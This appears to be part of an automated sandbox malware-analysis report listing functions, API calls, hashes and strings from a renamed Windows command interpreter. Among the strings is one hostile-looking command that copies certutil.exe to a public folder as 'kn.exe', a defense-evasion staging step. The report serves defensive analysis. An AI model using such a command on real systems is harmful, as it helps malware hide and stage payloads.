                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6E942F52A,00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F8DE
                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F8FB
                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F951
                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F96B
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942FA8E
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E942FB14
                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942FB2D
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942FBEA
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E942F996
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6E944849D,?,?,?,00007FF6E944F0C7), ref: 00007FF6E9430045
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E944F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E9430071
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430092
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94300A7
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9430181
                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D401
                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D41B
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D435
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D480
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                        • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                        • API String ID: 3964947564-518410914
                                                                                                                                                                        • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                        • Instruction ID: f11491fd3a9cfbd86ad8d8ec6a93957a99af7b9c50ae7648930a1561e012b7ad
                                                                                                                                                                        • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                        • Instruction Fuzzy Hash: 45027C73A19602C6FB149F31A85437866A1FF4AB54F944235D90EC36A1EF3FA84CC70A
                                                                                                                                                                        Function 00007FF6E94302A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                        • Instruction ID: c7aeab089b9f7628b17573abfa337ace0854aa88f9e5d843b40646b6c30570bb
                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 10D14563A08647C6FB10AF71A8493B927A1BF44B44F448035DA4EC63A5EE3EE44DC71A
                                                                                                                                                                        Function 00007FF6E943081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                        • API String ID: 198002717-267741548
                                                                                                                                                                        • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                        • Instruction ID: 7276b3592198f0cd5e5591fe05e01afe6b7947f11a08dedf80eaac8d9edf0591
                                                                                                                                                                        • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E510C62A08743C6FB149F65A814379BBA0FF4AB80F44A235D90E87755DF2EE44CC74A
                                                                                                                                                                        Function 00007FF6E942EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F000
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F031
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigitiswspacewcschr
                                                                                                                                                                        • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                        • API String ID: 1595556998-2755026540
                                                                                                                                                                        • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                        • Instruction ID: a03ac9fafca4cf9700b1a35a8069b8bd5d9d0e026299cc3dcdb925c40dd1dce7
                                                                                                                                                                        • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                        • Instruction Fuzzy Hash: CC228CA7E08656C1FB649F25A54437926A0BF06B90FC04172D98DC32E1EF3EA48DC71B
                                                                                                                                                                        Function 00007FF6E942D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                        • String ID: "$=,;
                                                                                                                                                                        • API String ID: 3545743878-4143597401
                                                                                                                                                                        • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                        • Instruction ID: b7cf5b8f2de817b004580f62814f6e57a008b8a6f8cfd5e48d14426d10127b99
                                                                                                                                                                        • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                        • Instruction Fuzzy Hash: 51C16967A09792C2EB65AF1190043B976E0BF89F45F499135DE4EC3394EF3EA449C30A
                                                                                                                                                                        Function 00007FF6E9445BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentFormatMessageThread
                                                                                                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                        • API String ID: 2411632146-3173542853
                                                                                                                                                                        • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                        • Instruction ID: 55035c9e9d619140f57e378967e898629cd2d540b8526957cd2eeadc4f641fa9
                                                                                                                                                                        • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                        • Instruction Fuzzy Hash: 72616AB2A19642C1EB24DF91A8047B963A4FF44B84F44413ADE4D87758DF3EE54ACB0A
                                                                                                                                                                        Function 00007FF6E94326E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile_open_osfhandle
                                                                                                                                                                        • String ID: con
                                                                                                                                                                        • API String ID: 2905481843-4257191772
                                                                                                                                                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                        • Instruction ID: 77a4eea96e4cd48e4847b908c555b6a38946d185274eecfbb37fe0f7dbe8e67a
                                                                                                                                                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D716C73A08681CAE760CF34A444379BAA0FF8AB61F544234DE5A82794DF3ED44DCB05
                                                                                                                                                                        Function 00007FF6E94493E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3829876242-3916222277
                                                                                                                                                                        • Opcode ID: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
                                                                                                                                                                        • Instruction ID: 6a691cfb2e0e0f8ddb5b4104b0c8172f82b55b58e74ac3b85bcaf1059a3c88d8
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
                                                                                                                                                                        • Instruction Fuzzy Hash: 01616C27A08642C6EB249F11D41427AB7A1FF89F94F458134DE0E87794DF3EE80ACB45
                                                                                                                                                                        Function 00007FF6E9451A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                        • API String ID: 3510147486-2605508654
                                                                                                                                                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction ID: 5bcb3aaa87656f2fc5fdf34ada2e853312160800a6410138107d0a702ec0e852
                                                                                                                                                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction Fuzzy Hash: AF614773608B82CAEB668F61D8543E977A5FF49B89F444139DA0D8B758DF3AD208C704
                                                                                                                                                                        Function 00007FF6E94272B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF6E9427279,?,?,?,?,?,00007FF6E942BFA9), ref: 00007FF6E9444485
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: longjmp
                                                                                                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                        • Instruction ID: 57fa3baaa31f231f1fa34637a335536b21f16d78c2498b6e1262b0cfd5229404
                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C17C33E0C686C1E6289F9661507BC2792BF46B84FA04036DD0DD7791CE3EA64EC74A
                                                                                                                                                                        Function 00007FF6E942B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E942BA2B
                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF6E942BA8A
                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF6E942BAAA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                        • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                        • API String ID: 2872855111-969133440
                                                                                                                                                                        • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                                                                        • Instruction ID: c741827d3432e8becd184f326678a86fb24b8a6d6a9b4473d9a5374f40e753ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                                                                        • Instruction Fuzzy Hash: 96B18023A0DA42C1EA608F25949437D67A4FF8AB84F954235CE5EC7794DF3EE449C30A
                                                                                                                                                                        Function 00007FF6E942FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
